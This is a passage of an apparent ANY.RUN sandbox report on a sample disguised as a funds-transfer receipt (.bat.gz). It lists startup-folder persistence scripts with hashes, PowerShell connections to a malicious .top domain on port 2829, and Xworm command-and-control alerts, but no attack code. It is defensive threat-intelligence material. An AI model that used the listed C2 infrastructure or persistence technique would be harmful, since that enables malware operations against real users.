8048powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4cf3828c.cmdtext
MD5:943329DF40DBDB287C26695E487602C2
SHA256:181510E15F65F9422B2E8B129BC6D3E4D50CBFB46E778E280F4A208780254287
7276powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3lawsix4.gji.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7292powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qoljuseh.3lv.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7148powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uhpgb3ws.imu.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2392powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zemvdgtg.hfn.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_73e88fd8.cmdtext
MD5:943329DF40DBDB287C26695E487602C2
SHA256:181510E15F65F9422B2E8B129BC6D3E4D50CBFB46E778E280F4A208780254287
7292powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jksdcqvq.oj1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7276powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_my1wepvg.sd3.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
38
DNS requests
6
Threats
18

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
POST
500
40.91.76.224:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
POST
500
40.91.76.224:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
8048
powershell.exe
37.120.153.94:2829
xinclas.vmcentra.top
M247 Ltd
SE
malicious
4920
slui.exe
40.91.76.224:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
8048
powershell.exe
37.120.156.182:2829
xinclas.vmcentra.top
M247 Ltd
PL
malicious
7428
slui.exe
40.91.76.224:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 20.73.194.208
whitelisted
google.com
  • 216.58.206.78
whitelisted
xinclas.vmcentra.top
  • 37.120.153.94
  • 37.120.156.182
malicious
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
8048
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm Network Packet
8048
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm Network Packet
8048
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm Network Packet
8048
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm Network Packet
8048
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm Network Packet
8048
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm Network Packet
8048
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm Network Packet
8048
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm Network Packet
8048
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm Network Packet
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
24032025_0932_CustomerReceiptforFundsTransfer_20250324-E-SWFT886050AX52951DU-CN_EU.bat.gz